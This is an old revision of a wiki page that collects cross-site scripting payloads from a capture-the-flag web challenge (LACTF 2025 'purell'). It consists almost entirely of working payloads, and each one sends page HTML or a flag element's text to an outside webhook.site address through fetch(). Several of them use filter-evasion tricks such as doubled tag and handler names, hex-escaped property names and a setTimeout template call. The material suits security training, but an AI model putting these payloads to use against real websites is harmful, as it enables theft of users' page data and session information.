xss-payloads
This is an old revision of the document!
HTTP Pipelining + HTTP/2 Single Packets
Some payloads from LACTF 2025: [WEB] purell
https://github.com/uclaacm/lactf-archive/blob/main/2025/web/purell/payloads.txt
<script> fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML)) </script> <img src=/f onerror=fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML))> <SCRIPT> fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURI(document.body.innerHTML)) </SCRIPT> <scriscriptpt> fetch( 'https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' + document['query\x53elector']('.flag')['text\x43\x6fntent'] ) </scriscriptpt> <img src=/foo oonnerror="fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' + document['query\x53elector']('.flag')['text\x43\x6fntent'])"// <img/src="/foo"/oonnerror="fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' + document['query\x53elector']('.flag')['text\x43\x6fntent'])"// <img/src="/foo"/oonnerror="window['set\x54imeout']`fetch\x28'https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q=' + document['query\x53elector']\x28'.flag'\x29['text\x43\x6fntent']\x29`"//
xss-payloads.1739144058.txt.gz · Last modified: 2025/02/09 23:34 by osorin